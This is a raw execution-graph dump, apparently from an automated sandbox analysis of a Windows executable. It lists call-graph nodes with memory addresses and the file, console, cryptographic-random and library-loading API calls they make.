                                                                                                                                                                                                                              execution_graph 38248 7ff6bbcfa924 38250 7ff6bbcfa949 snprintf 38248->38250 38249 7ff6bbcfa97f CompareStringA 38250->38249 38251 7ff6bbcb82f0 38252 7ff6bbcb8306 38251->38252 38265 7ff6bbcb836f 38251->38265 38253 7ff6bbcb8324 38252->38253 38256 7ff6bbcb8371 38252->38256 38252->38265 38371 7ff6bbcd2414 61 API calls 38253->38371 38255 7ff6bbcb8347 38372 7ff6bbcd1998 138 API calls 38255->38372 38256->38265 38380 7ff6bbcd1998 138 API calls 38256->38380 38259 7ff6bbcb835e 38373 7ff6bbcd18ac 38259->38373 38264 7ff6bbcb8578 38266 7ff6bbcbb540 147 API calls 38264->38266 38274 7ff6bbcba410 38265->38274 38271 7ff6bbcb858f 38266->38271 38267 7ff6bbcbb540 147 API calls 38267->38264 38268 7ff6bbcb8634 38382 7ff6bbd0a610 38268->38382 38271->38268 38381 7ff6bbcb9628 175 API calls 38271->38381 38391 7ff6bbce7a68 38274->38391 38277 7ff6bbcb853a 38279 7ff6bbcbb540 38277->38279 38283 7ff6bbcbb55f setbuf 38279->38283 38280 7ff6bbcbb5a1 38281 7ff6bbcbb5d8 38280->38281 38282 7ff6bbcbb5b8 38280->38282 38539 7ff6bbce8c1c 38281->38539 38425 7ff6bbcbaba0 38282->38425 38283->38280 38421 7ff6bbcba4d0 38283->38421 38286 7ff6bbd0a610 _handle_error 8 API calls 38287 7ff6bbcb854f 38286->38287 38287->38264 38287->38267 38288 7ff6bbcbb67f 38289 7ff6bbcbbc91 38288->38289 38291 7ff6bbcbbbae 38288->38291 38292 7ff6bbcbb6a5 38288->38292 38290 7ff6bbcbb5d3 38289->38290 38294 7ff6bbcd2574 126 API calls 38289->38294 38290->38286 38295 7ff6bbce8d00 48 API calls 38291->38295 38292->38290 38305 7ff6bbcbb6b5 38292->38305 38321 7ff6bbcbb79f 38292->38321 38294->38290 38297 7ff6bbcbbc5c 38295->38297 38608 7ff6bbce8d38 48 API calls 38297->38608 38300 7ff6bbcbbc69 38609 7ff6bbce8d38 48 API calls 38300->38609 38303 7ff6bbcbbc76 38610 7ff6bbce8d38 48 API calls 38303->38610 38305->38290 38573 7ff6bbce8d00 38305->38573 38306 7ff6bbcbbc84 38611 7ff6bbce8d88 48 API calls 38306->38611 38311 7ff6bbcbb726 38577 7ff6bbce8d38 48 API calls 38311->38577 38313 7ff6bbcbb733 38314 7ff6bbcbb749 38313->38314 38578 7ff6bbce8d88 48 API calls 38313->38578 38315 7ff6bbcbb75c 38314->38315 38579 7ff6bbce8d38 48 API calls 38314->38579 38318 7ff6bbcbb779 38315->38318 38320 7ff6bbce8d00 48 API calls 38315->38320 38580 7ff6bbce8f94 38318->38580 38320->38315 38322 7ff6bbcbb8e5 38321->38322 38590 7ff6bbcbc3c8 CharLowerW CharUpperW 38321->38590 38591 7ff6bbcfd840 WideCharToMultiByte 38322->38591 38326 7ff6bbcbb9a1 38328 7ff6bbce8d00 48 API calls 38326->38328 38329 7ff6bbcbb9c4 38328->38329 38594 7ff6bbce8d38 48 API calls 38329->38594 38330 7ff6bbcbb910 38330->38326 38593 7ff6bbcb945c 55 API calls _handle_error 38330->38593 38332 7ff6bbcbb9d1 38595 7ff6bbce8d38 48 API calls 38332->38595 38334 7ff6bbcbb9de 38596 7ff6bbce8d88 48 API calls 38334->38596 38336 7ff6bbcbb9eb 38597 7ff6bbce8d88 48 API calls 38336->38597 38338 7ff6bbcbba0b 38339 7ff6bbce8d00 48 API calls 38338->38339 38340 7ff6bbcbba27 38339->38340 38598 7ff6bbce8d88 48 API calls 38340->38598 38342 7ff6bbcbba37 38343 7ff6bbcbba49 38342->38343 38599 7ff6bbcfbc48 15 API calls 38342->38599 38600 7ff6bbce8d88 48 API calls 38343->38600 38346 7ff6bbcbba59 38347 7ff6bbce8d00 48 API calls 38346->38347 38348 7ff6bbcbba66 38347->38348 38349 7ff6bbce8d00 48 API calls 38348->38349 38350 7ff6bbcbba78 38349->38350 38601 7ff6bbce8d38 48 API calls 38350->38601 38352 7ff6bbcbba85 38602 7ff6bbce8d88 48 API calls 38352->38602 38354 7ff6bbcbba92 38362 7ff6bbcbbacd 38354->38362 38603 7ff6bbce8d88 48 API calls 38354->38603 38357 7ff6bbcbbab2 38604 7ff6bbce8d88 48 API calls 38357->38604 38360 7ff6bbcbbb33 38361 7ff6bbcbbb53 38360->38361 38364 7ff6bbce8e3c 48 API calls 38360->38364 38365 7ff6bbcbbb6e 38361->38365 38368 7ff6bbce8e3c 48 API calls 38361->38368 38605 7ff6bbce8e3c 38362->38605 38363 7ff6bbce8d00 48 API calls 38366 7ff6bbcbbb09 38363->38366 38364->38361 38369 7ff6bbce8f94 126 API calls 38365->38369 38366->38360 38367 7ff6bbce8e3c 48 API calls 38366->38367 38367->38360 38368->38365 38369->38290 38371->38255 38372->38259 38374 7ff6bbcd18db 38373->38374 38375 7ff6bbcd18ca 38373->38375 38374->38265 38375->38374 38376 7ff6bbcd18de 38375->38376 38377 7ff6bbcd18d6 38375->38377 38838 7ff6bbcd1930 38376->38838 38833 7ff6bbcd1c24 38377->38833 38380->38265 38381->38268 38385 7ff6bbd0a61a 38382->38385 38383 7ff6bbd0a6a0 IsProcessorFeaturePresent 38386 7ff6bbd0a6b7 38383->38386 38384 7ff6bbcb8663 38385->38383 38385->38384 38846 7ff6bbd0a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38386->38846 38388 7ff6bbd0a6ca 38847 7ff6bbd0a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38388->38847 38392 7ff6bbce7a8d 38391->38392 38394 7ff6bbcba434 38391->38394 38393 7ff6bbce7aaf 38392->38393 38404 7ff6bbce7340 157 API calls 38392->38404 38393->38394 38396 7ff6bbcd22e0 12 API calls 38393->38396 38394->38277 38399 7ff6bbcd22e0 38394->38399 38397 7ff6bbce7adf 38396->38397 38405 7ff6bbcd2440 38397->38405 38415 7ff6bbcd20b4 38399->38415 38402 7ff6bbcd2307 38402->38277 38404->38393 38406 7ff6bbcd246a SetFilePointer 38405->38406 38409 7ff6bbcd2454 38405->38409 38407 7ff6bbcd24ad 38406->38407 38408 7ff6bbcd248d GetLastError 38406->38408 38407->38394 38408->38407 38410 7ff6bbcd2497 38408->38410 38409->38407 38413 7ff6bbcccd00 10 API calls 38409->38413 38410->38407 38414 7ff6bbcccd00 10 API calls 38410->38414 38418 7ff6bbcd2130 38415->38418 38419 7ff6bbcd20d0 38415->38419 38416 7ff6bbcd2102 SetFilePointer 38417 7ff6bbcd2126 GetLastError 38416->38417 38416->38418 38417->38418 38418->38402 38420 7ff6bbcccd00 10 API calls 38418->38420 38419->38416 38422 7ff6bbcba4ea 38421->38422 38423 7ff6bbcba4ee 38422->38423 38424 7ff6bbcd2440 12 API calls 38422->38424 38423->38280 38424->38423 38426 7ff6bbcbabbf setbuf 38425->38426 38427 7ff6bbce8c1c 48 API calls 38426->38427 38428 7ff6bbcbabf5 38427->38428 38431 7ff6bbcbb4af 38428->38431 38450 7ff6bbcbaca7 38428->38450 38612 7ff6bbcc9be0 38428->38612 38429 7ff6bbcbacbf 38432 7ff6bbcbacc8 38429->38432 38433 7ff6bbcbb35c 38429->38433 38430 7ff6bbcbb4ff 38652 7ff6bbce72c0 38430->38652 38431->38430 38435 7ff6bbcd2574 126 API calls 38431->38435 38440 7ff6bbcbacdd 38432->38440 38471 7ff6bbcbaea7 38432->38471 38538 7ff6bbcbad60 38432->38538 38437 7ff6bbce8eec 48 API calls 38433->38437 38435->38430 38439 7ff6bbcbb395 38437->38439 38442 7ff6bbcbb3ad 38439->38442 38651 7ff6bbcb9e2c 48 API calls 38439->38651 38443 7ff6bbcbad68 38440->38443 38444 7ff6bbcbace6 38440->38444 38441 7ff6bbcc90b8 75 API calls 38445 7ff6bbcbac8f 38441->38445 38449 7ff6bbce8eec 48 API calls 38442->38449 38447 7ff6bbce8eec 48 API calls 38443->38447 38444->38538 38623 7ff6bbce8eec 38444->38623 38445->38450 38456 7ff6bbcd2574 126 API calls 38445->38456 38451 7ff6bbcbad9c 38447->38451 38448 7ff6bbd0a610 _handle_error 8 API calls 38452 7ff6bbcbb52b 38448->38452 38453 7ff6bbcbb3d4 38449->38453 38450->38429 38450->38431 38457 7ff6bbce8eec 48 API calls 38451->38457 38452->38290 38458 7ff6bbcbb3e6 38453->38458 38461 7ff6bbce8eec 48 API calls 38453->38461 38456->38450 38460 7ff6bbcbada9 38457->38460 38462 7ff6bbce8eec 48 API calls 38458->38462 38459 7ff6bbce8eec 48 API calls 38463 7ff6bbcbad31 38459->38463 38464 7ff6bbce8eec 48 API calls 38460->38464 38461->38458 38465 7ff6bbcbb451 38462->38465 38466 7ff6bbce8eec 48 API calls 38463->38466 38467 7ff6bbcbadb5 38464->38467 38468 7ff6bbcbb471 38465->38468 38476 7ff6bbce8eec 48 API calls 38465->38476 38469 7ff6bbcbad46 38466->38469 38470 7ff6bbce8eec 48 API calls 38467->38470 38473 7ff6bbcbb486 38468->38473 38477 7ff6bbce8e3c 48 API calls 38468->38477 38472 7ff6bbce8f94 126 API calls 38469->38472 38474 7ff6bbcbadc2 38470->38474 38480 7ff6bbcbafda 38471->38480 38641 7ff6bbcb9b64 48 API calls _handle_error 38471->38641 38472->38538 38478 7ff6bbce8f94 126 API calls 38473->38478 38475 7ff6bbce8d00 48 API calls 38474->38475 38479 7ff6bbcbadcf 38475->38479 38476->38468 38477->38473 38478->38538 38481 7ff6bbcc90b8 75 API calls 38479->38481 38487 7ff6bbcbaff2 38480->38487 38642 7ff6bbcb9d98 48 API calls 38480->38642 38483 7ff6bbcbae22 38481->38483 38485 7ff6bbce8e3c 48 API calls 38483->38485 38486 7ff6bbcbae33 38485->38486 38488 7ff6bbce8e3c 48 API calls 38486->38488 38490 7ff6bbcbb02b 38487->38490 38643 7ff6bbcb9efc 48 API calls _handle_error 38487->38643 38491 7ff6bbcbae48 38488->38491 38489 7ff6bbcbb0af 38493 7ff6bbcbb0c8 38489->38493 38645 7ff6bbcba1a0 48 API calls 2 library calls 38489->38645 38490->38489 38644 7ff6bbcba2c8 48 API calls 38490->38644 38627 7ff6bbcf9ce4 38491->38627 38496 7ff6bbcbb0e2 38493->38496 38646 7ff6bbcba350 48 API calls _handle_error 38493->38646 38500 7ff6bbce8eec 48 API calls 38496->38500 38501 7ff6bbcbb0fc 38500->38501 38503 7ff6bbce8eec 48 API calls 38501->38503 38505 7ff6bbcbb109 38503->38505 38507 7ff6bbcbb11f 38505->38507 38510 7ff6bbce8eec 48 API calls 38505->38510 38506 7ff6bbce8e3c 48 API calls 38508 7ff6bbcbae80 38506->38508 38637 7ff6bbce8e94 38507->38637 38509 7ff6bbce8f94 126 API calls 38508->38509 38509->38538 38510->38507 38513 7ff6bbce8eec 48 API calls 38514 7ff6bbcbb147 38513->38514 38515 7ff6bbce8e94 48 API calls 38514->38515 38516 7ff6bbcbb15f 38515->38516 38517 7ff6bbce8eec 48 API calls 38516->38517 38520 7ff6bbcbb16c 38517->38520 38518 7ff6bbcbb18a 38519 7ff6bbcbb1a9 38518->38519 38648 7ff6bbce8d88 48 API calls 38518->38648 38522 7ff6bbce8e94 48 API calls 38519->38522 38520->38518 38647 7ff6bbce8d88 48 API calls 38520->38647 38524 7ff6bbcbb1bc 38522->38524 38525 7ff6bbce8eec 48 API calls 38524->38525 38526 7ff6bbcbb1d6 38525->38526 38528 7ff6bbcbb1e9 38526->38528 38649 7ff6bbcbc3c8 CharLowerW CharUpperW 38526->38649 38528->38528 38529 7ff6bbce8eec 48 API calls 38528->38529 38530 7ff6bbcbb21f 38529->38530 38531 7ff6bbce8e3c 48 API calls 38530->38531 38532 7ff6bbcbb230 38531->38532 38533 7ff6bbcbb247 38532->38533 38534 7ff6bbce8e3c 48 API calls 38532->38534 38535 7ff6bbce8f94 126 API calls 38533->38535 38534->38533 38536 7ff6bbcbb278 38535->38536 38536->38538 38650 7ff6bbce70d8 4 API calls 2 library calls 38536->38650 38538->38448 38693 7ff6bbce8f28 38539->38693 38542 7ff6bbcc90b8 38543 7ff6bbcc9123 38542->38543 38555 7ff6bbcc91a9 38542->38555 38543->38555 38711 7ff6bbcf7e74 38543->38711 38545 7ff6bbd0a610 _handle_error 8 API calls 38547 7ff6bbcbb66e 38545->38547 38558 7ff6bbcd2574 38547->38558 38548 7ff6bbcfd840 WideCharToMultiByte 38549 7ff6bbcc9157 38548->38549 38550 7ff6bbcc91c4 38549->38550 38551 7ff6bbcc916a 38549->38551 38549->38555 38730 7ff6bbcc9338 12 API calls _handle_error 38550->38730 38553 7ff6bbcc916f 38551->38553 38554 7ff6bbcc91ab 38551->38554 38553->38555 38715 7ff6bbcc98b0 38553->38715 38729 7ff6bbcc951c 71 API calls _handle_error 38554->38729 38555->38545 38559 7ff6bbcd25a5 38558->38559 38560 7ff6bbcd259e 38558->38560 38561 7ff6bbcd25ab GetStdHandle 38559->38561 38566 7ff6bbcd25ba 38559->38566 38560->38288 38561->38566 38562 7ff6bbcd2619 WriteFile 38562->38566 38563 7ff6bbcd25cf WriteFile 38564 7ff6bbcd260b 38563->38564 38563->38566 38564->38563 38564->38566 38565 7ff6bbcd2658 GetLastError 38565->38566 38566->38560 38566->38562 38566->38563 38566->38565 38571 7ff6bbcd2721 38566->38571 38827 7ff6bbcd3144 9 API calls 2 library calls 38566->38827 38828 7ff6bbcccf34 10 API calls 38566->38828 38829 7ff6bbccc95c 126 API calls 38566->38829 38568 7ff6bbcd2684 SetLastError 38568->38566 38830 7ff6bbcccf14 10 API calls 38571->38830 38574 7ff6bbcb161c 48 API calls 38573->38574 38575 7ff6bbcbb719 38574->38575 38576 7ff6bbce8d38 48 API calls 38575->38576 38576->38311 38577->38313 38578->38314 38579->38315 38581 7ff6bbce9131 38580->38581 38582 7ff6bbce8fcf 38580->38582 38581->38290 38589 7ff6bbce905d 38582->38589 38831 7ff6bbccca6c 48 API calls 2 library calls 38582->38831 38583 7ff6bbcd2574 126 API calls 38583->38581 38584 7ff6bbcb161c 48 API calls 38585 7ff6bbce90e0 38584->38585 38585->38581 38585->38583 38587 7ff6bbce904c 38832 7ff6bbccca40 61 API calls _CxxThrowException 38587->38832 38589->38584 38589->38585 38590->38322 38592 7ff6bbcbb8f8 CharToOemA 38591->38592 38592->38330 38593->38326 38594->38332 38595->38334 38596->38336 38597->38338 38598->38342 38599->38343 38600->38346 38601->38352 38602->38354 38603->38357 38604->38362 38606 7ff6bbcb161c 48 API calls 38605->38606 38607 7ff6bbcbbaf2 38606->38607 38607->38360 38607->38363 38607->38366 38608->38300 38609->38303 38610->38306 38611->38289 38656 7ff6bbcc901c CryptAcquireContextW 38612->38656 38616 7ff6bbcc9c2a 38617 7ff6bbcf9ce4 8 API calls 38616->38617 38618 7ff6bbcc9c49 38617->38618 38619 7ff6bbcf9b70 8 API calls 38618->38619 38620 7ff6bbcc9c5b __BuildCatchObjectHelper 38619->38620 38621 7ff6bbd0a610 _handle_error 8 API calls 38620->38621 38622 7ff6bbcbac34 38621->38622 38622->38441 38624 7ff6bbce8efc 38623->38624 38625 7ff6bbce8d00 48 API calls 38624->38625 38626 7ff6bbcbad24 38624->38626 38625->38624 38626->38459 38628 7ff6bbcbae60 38627->38628 38629 7ff6bbcf9d15 __BuildCatchObjectHelper 38627->38629 38631 7ff6bbcf9b70 38628->38631 38629->38628 38672 7ff6bbcf9d74 38629->38672 38632 7ff6bbcf9bd9 memcpy_s 38631->38632 38635 7ff6bbcf9bad memcpy_s 38631->38635 38633 7ff6bbcf9d74 8 API calls 38632->38633 38634 7ff6bbcbae6d 38633->38634 38634->38506 38635->38632 38636 7ff6bbcf9d74 8 API calls 38635->38636 38636->38632 38638 7ff6bbce8eac 38637->38638 38639 7ff6bbce8d00 48 API calls 38638->38639 38640 7ff6bbcbb137 38638->38640 38639->38638 38640->38513 38641->38480 38642->38487 38643->38490 38644->38489 38645->38493 38646->38496 38647->38518 38648->38519 38649->38528 38650->38538 38651->38442 38653 7ff6bbce72dd 38652->38653 38654 7ff6bbce7304 38653->38654 38676 7ff6bbd0a480 38653->38676 38654->38538 38657 7ff6bbcc907e 38656->38657 38658 7ff6bbcc9057 CryptGenRandom CryptReleaseContext 38656->38658 38660 7ff6bbcc9c9c 11 API calls 38657->38660 38658->38657 38659 7ff6bbcc9089 38658->38659 38661 7ff6bbcc9c9c 38659->38661 38660->38659 38666 7ff6bbcfc0a8 GetSystemTime SystemTimeToFileTime 38661->38666 38663 7ff6bbcc9cc5 38669 7ff6bbd12d74 38663->38669 38667 7ff6bbd0a610 _handle_error 8 API calls 38666->38667 38668 7ff6bbcfc0f1 38667->38668 38668->38663 38670 7ff6bbcc9cd7 38669->38670 38671 7ff6bbd12d8b QueryPerformanceCounter 38669->38671 38670->38616 38671->38670 38673 7ff6bbcf9dbc 38672->38673 38674 7ff6bbd0a610 _handle_error 8 API calls 38673->38674 38675 7ff6bbcf9f40 38674->38675 38675->38629 38677 7ff6bbd0a444 38676->38677 38678 7ff6bbd0a47a 38677->38678 38682 7ff6bbd136c0 38677->38682 38685 7ff6bbd0b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38677->38685 38686 7ff6bbd0b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38677->38686 38678->38654 38687 7ff6bbd13700 38682->38687 38692 7ff6bbd16938 EnterCriticalSection 38687->38692 38689 7ff6bbd1370d 38690 7ff6bbd16998 abort LeaveCriticalSection 38689->38690 38691 7ff6bbd136d2 38690->38691 38691->38677 38696 7ff6bbcb161c 38693->38696 38695 7ff6bbcbb601 38695->38288 38695->38289 38695->38542 38697 7ff6bbcb1640 38696->38697 38706 7ff6bbcb16aa __BuildCatchObjectHelper 38696->38706 38698 7ff6bbcb166d 38697->38698 38707 7ff6bbccca6c 48 API calls 2 library calls 38697->38707 38699 7ff6bbcb168e 38698->38699 38700 7ff6bbcb16d4 38698->38700 38699->38706 38709 7ff6bbcccb64 8 API calls 38699->38709 38700->38706 38710 7ff6bbcccb64 8 API calls 38700->38710 38702 7ff6bbcb1661 38708 7ff6bbcccb64 8 API calls 38702->38708 38706->38695 38707->38702 38712 7ff6bbcc9143 38711->38712 38713 7ff6bbcf7e95 38711->38713 38712->38548 38731 7ff6bbcf7ec8 38713->38731 38716 7ff6bbcc9b45 38715->38716 38720 7ff6bbcc9920 38715->38720 38717 7ff6bbd0a610 _handle_error 8 API calls 38716->38717 38718 7ff6bbcc9b61 38717->38718 38718->38555 38721 7ff6bbcc996d 38720->38721 38722 7ff6bbcc9b75 38720->38722 38763 7ff6bbcf7da8 38720->38763 38721->38721 38770 7ff6bbcca0f4 38721->38770 38724 7ff6bbcf7f24 68 API calls 38722->38724 38726 7ff6bbcc9acb 38724->38726 38725 7ff6bbcc99d0 38725->38725 38786 7ff6bbcf7f24 38725->38786 38726->38716 38726->38726 38800 7ff6bbcf4ea8 8 API calls _handle_error 38726->38800 38729->38555 38730->38555 38733 7ff6bbcf7efa __BuildCatchObjectHelper 38731->38733 38732 7ff6bbcf7fb5 38735 7ff6bbcf805c GetCurrentProcessId 38732->38735 38738 7ff6bbcf7ff1 38732->38738 38733->38732 38745 7ff6bbcfb3f0 38733->38745 38744 7ff6bbcf8034 38735->38744 38737 7ff6bbcf7f7e GetProcAddressForCaller GetProcAddress 38737->38732 38738->38744 38754 7ff6bbccca6c 48 API calls 2 library calls 38738->38754 38740 7ff6bbcf801f 38755 7ff6bbcccda4 10 API calls 2 library calls 38740->38755 38742 7ff6bbcf8027 38756 7ff6bbccca40 61 API calls _CxxThrowException 38742->38756 38744->38712 38757 7ff6bbd0a5a0 38745->38757 38748 7ff6bbcfb42c 38759 7ff6bbce48bc 38748->38759 38749 7ff6bbcfb428 38752 7ff6bbd0a610 _handle_error 8 API calls 38749->38752 38753 7ff6bbcf7f72 38752->38753 38753->38732 38753->38737 38754->38740 38755->38742 38756->38744 38758 7ff6bbcfb3fc GetSystemDirectoryW 38757->38758 38758->38748 38758->38749 38760 7ff6bbce48cb setbuf 38759->38760 38761 7ff6bbd0a610 _handle_error 8 API calls 38760->38761 38762 7ff6bbce493a LoadLibraryExW 38761->38762 38762->38749 38764 7ff6bbcf7e74 68 API calls 38763->38764 38765 7ff6bbcf7ddc 38764->38765 38766 7ff6bbcf7e74 68 API calls 38765->38766 38767 7ff6bbcf7def 38766->38767 38768 7ff6bbd0a610 _handle_error 8 API calls 38767->38768 38769 7ff6bbcf7e43 38768->38769 38769->38720 38774 7ff6bbcca15c __BuildCatchObjectHelper 38770->38774 38771 7ff6bbcca358 38823 7ff6bbd0a774 8 API calls __report_securityfailure 38771->38823 38773 7ff6bbcca352 38822 7ff6bbd0a774 8 API calls __report_securityfailure 38773->38822 38774->38771 38774->38773 38776 7ff6bbcca192 38774->38776 38777 7ff6bbcca34d 38774->38777 38775 7ff6bbcca35e 38801 7ff6bbcc9dd8 38776->38801 38821 7ff6bbd0a774 8 API calls __report_securityfailure 38777->38821 38781 7ff6bbcca1d9 38782 7ff6bbcc9dd8 8 API calls 38781->38782 38783 7ff6bbcca2f1 38781->38783 38782->38781 38784 7ff6bbd0a610 _handle_error 8 API calls 38783->38784 38785 7ff6bbcca33b 38784->38785 38785->38725 38787 7ff6bbcf7f5e 38786->38787 38793 7ff6bbcf7fb5 38786->38793 38788 7ff6bbcfb3f0 10 API calls 38787->38788 38787->38793 38791 7ff6bbcf7f72 38788->38791 38789 7ff6bbcf805c GetCurrentProcessId 38792 7ff6bbcf8034 38789->38792 38790 7ff6bbcf7ff1 38790->38792 38824 7ff6bbccca6c 48 API calls 2 library calls 38790->38824 38791->38793 38794 7ff6bbcf7f7e GetProcAddressForCaller GetProcAddress 38791->38794 38792->38726 38793->38789 38793->38790 38794->38793 38796 7ff6bbcf801f 38825 7ff6bbcccda4 10 API calls 2 library calls 38796->38825 38798 7ff6bbcf8027 38826 7ff6bbccca40 61 API calls _CxxThrowException 38798->38826 38800->38716 38802 7ff6bbcc9e46 38801->38802 38808 7ff6bbcc9e6e memcpy_s 38801->38808 38803 7ff6bbcf9ce4 8 API calls 38802->38803 38804 7ff6bbcc9e5e 38803->38804 38805 7ff6bbcf9b70 8 API calls 38804->38805 38805->38808 38806 7ff6bbcc9e85 38807 7ff6bbcf9ce4 8 API calls 38806->38807 38809 7ff6bbcc9f97 38807->38809 38808->38806 38810 7ff6bbcf9ce4 8 API calls 38808->38810 38811 7ff6bbcf9b70 8 API calls 38809->38811 38810->38806 38812 7ff6bbcc9fa8 memcpy_s 38811->38812 38813 7ff6bbcc9fb4 38812->38813 38815 7ff6bbcf9ce4 8 API calls 38812->38815 38814 7ff6bbcf9ce4 8 API calls 38813->38814 38816 7ff6bbcca0bb 38814->38816 38815->38813 38817 7ff6bbcf9b70 8 API calls 38816->38817 38818 7ff6bbcca0c9 38817->38818 38819 7ff6bbd0a610 _handle_error 8 API calls 38818->38819 38820 7ff6bbcca0d8 38819->38820 38820->38781 38821->38773 38822->38771 38823->38775 38824->38796 38825->38798 38826->38792 38827->38568 38829->38566 38831->38587 38832->38589 38834 7ff6bbcd1c37 38833->38834 38835 7ff6bbcd1c3b 38833->38835 38834->38374 38835->38834 38836 7ff6bbcd1c5d 38835->38836 38844 7ff6bbcd2d6c 12 API calls 2 library calls 38836->38844 38839 7ff6bbcd194c 38838->38839 38840 7ff6bbcd1964 38838->38840 38839->38840 38842 7ff6bbcd1958 CloseHandle 38839->38842 38841 7ff6bbcd1988 38840->38841 38845 7ff6bbccc9d0 10 API calls 38840->38845 38841->38374 38842->38840 38844->38834 38845->38841 38846->38388 38848 7ff6bbcb3e71 38849 7ff6bbcb3e81 38848->38849 38850 7ff6bbcb3e89 38848->38850 38849->38850 38859 7ff6bbd09a14 49 API calls 38849->38859 38852 7ff6bbcb3edd 38850->38852 38853 7ff6bbcb3ea3 38850->38853 38855 7ff6bbd0a610 _handle_error 8 API calls 38852->38855 38860 7ff6bbcd331c 48 API calls 2 library calls 38853->38860 38856 7ff6bbcb3eef 38855->38856 38857 7ff6bbcb3eab 38857->38852 38861 7ff6bbcb63e8 8 API calls 2 library calls 38857->38861 38859->38850 38860->38857 38861->38852 38862 7ff6bbcb1884 38994 7ff6bbce34e4 38862->38994 38865 7ff6bbcb1926 38867 7ff6bbcb195b 38865->38867 39058 7ff6bbce3f98 63 API calls 2 library calls 38865->39058 38866 7ff6bbce34e4 CompareStringW 38868 7ff6bbcb18a6 38866->38868 38875 7ff6bbcb1970 38867->38875 39059 7ff6bbcd2ed8 100 API calls 3 library calls 38867->39059 38869 7ff6bbce34e4 CompareStringW 38868->38869 38874 7ff6bbcb18b9 38868->38874 38869->38874 38873 7ff6bbcb1915 39057 7ff6bbccca40 61 API calls _CxxThrowException 38873->39057 38874->38865 39056 7ff6bbcb1168 8 API calls 2 library calls 38874->39056 38877 7ff6bbcb19b8 38875->38877 39060 7ff6bbcf49f4 48 API calls 38875->39060 38998 7ff6bbcb5450 38877->38998 38879 7ff6bbcb19b0 39061 7ff6bbcc8444 54 API calls fflush 38879->39061 38885 7ff6bbcb72c4 76 API calls 38892 7ff6bbcb1a12 38885->38892 38886 7ff6bbcb1b04 39036 7ff6bbcc6c94 38886->39036 38887 7ff6bbcb1ae6 39032 7ff6bbcb7514 38887->39032 38890 7ff6bbcb1af2 38891 7ff6bbcb7514 72 API calls 38890->38891 38893 7ff6bbcb1aff 38891->38893 38892->38886 38892->38887 38894 7ff6bbd0a610 _handle_error 8 API calls 38893->38894 38895 7ff6bbcb2f97 38894->38895 38896 7ff6bbcb1b13 39052 7ff6bbcb7148 38896->39052 38898 7ff6bbcb1c71 38899 7ff6bbcb1ca7 38898->38899 38900 7ff6bbcb63e8 8 API calls 38898->38900 38901 7ff6bbcb1ce4 38899->38901 38902 7ff6bbcb1cd5 38899->38902 38903 7ff6bbcb1c91 38900->38903 38905 7ff6bbd0a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38901->38905 38904 7ff6bbd0a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38902->38904 38906 7ff6bbcb49b8 99 API calls 38903->38906 38909 7ff6bbcb1cee 38904->38909 38905->38909 38907 7ff6bbcb1c9d 38906->38907 38908 7ff6bbcb63e8 8 API calls 38907->38908 38908->38899 38910 7ff6bbcb1d50 38909->38910 38912 7ff6bbcfde30 72 API calls 38909->38912 38911 7ff6bbd0a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38910->38911 38913 7ff6bbcb1d62 38911->38913 38912->38910 38914 7ff6bbcfdbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38913->38914 38915 7ff6bbcb1d7b 38913->38915 38914->38915 38916 7ff6bbd02bcc 66 API calls 38915->38916 38917 7ff6bbcb1dba 38916->38917 38993 7ff6bbcdae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38917->38993 38918 7ff6bbcb1e1c 38920 7ff6bbcb10c0 8 API calls 38918->38920 38922 7ff6bbcb1e5d 38918->38922 38919 7ff6bbcb1dde std::bad_alloc::bad_alloc 38919->38918 38921 7ff6bbd0ba34 _CxxThrowException RtlPcToFileHeader RaiseException 38919->38921 38920->38922 38921->38918 38923 7ff6bbcba410 159 API calls 38922->38923 38934 7ff6bbcb1ef4 38922->38934 38923->38934 38924 7ff6bbcb2ccc 38925 7ff6bbcb2d0c 38924->38925 38992 7ff6bbcd8c80 72 API calls 38924->38992 38926 7ff6bbcfde30 72 API calls 38925->38926 38932 7ff6bbcb2d21 38925->38932 38926->38932 38927 7ff6bbcd6688 48 API calls 38927->38934 38928 7ff6bbcb2d86 38936 7ff6bbcf49f4 48 API calls 38928->38936 38941 7ff6bbcb2dd0 38928->38941 38929 7ff6bbcf49f4 48 API calls 38933 7ff6bbcb2005 38929->38933 38930 7ff6bbcfb6d0 73 API calls 38930->38933 38931 7ff6bbcb5e70 169 API calls 38931->38933 38932->38928 38938 7ff6bbcf49f4 48 API calls 38932->38938 38933->38929 38933->38930 38933->38931 38933->38934 38939 7ff6bbcb5928 237 API calls 38933->38939 38952 7ff6bbcce21c 63 API calls 38933->38952 38967 7ff6bbcbb540 147 API calls 38933->38967 38988 7ff6bbcc8444 54 API calls 38933->38988 38934->38924 38934->38927 38934->38933 38940 7ff6bbcbe6c8 157 API calls 38934->38940 38944 7ff6bbcba410 159 API calls 38934->38944 38950 7ff6bbcbb540 147 API calls 38934->38950 38955 7ff6bbcba4d0 12 API calls 38934->38955 38956 7ff6bbcd65b4 48 API calls 38934->38956 38958 7ff6bbcd4554 16 API calls 38934->38958 38959 7ff6bbcd1998 138 API calls 38934->38959 38961 7ff6bbcb5db4 46 API calls 38934->38961 38964 7ff6bbcd1e80 15 API calls 38934->38964 38968 7ff6bbcccbd0 75 API calls 38934->38968 38969 7ff6bbcd7c7c 127 API calls 38934->38969 38970 7ff6bbcd1930 11 API calls 38934->38970 38971 7ff6bbcb571c 12 API calls 38934->38971 38974 7ff6bbcb5004 49 API calls 38934->38974 38976 7ff6bbcd18ac 15 API calls 38934->38976 38977 7ff6bbcb1168 8 API calls 38934->38977 38978 7ff6bbcfd48c 58 API calls 38934->38978 38979 7ff6bbcb5e70 169 API calls 38934->38979 38980 7ff6bbcfc0a8 10 API calls 38934->38980 38981 7ff6bbcc9be0 14 API calls 38934->38981 38982 7ff6bbcd6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38934->38982 38983 7ff6bbce97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 38934->38983 38984 7ff6bbcd5c0c 237 API calls 38934->38984 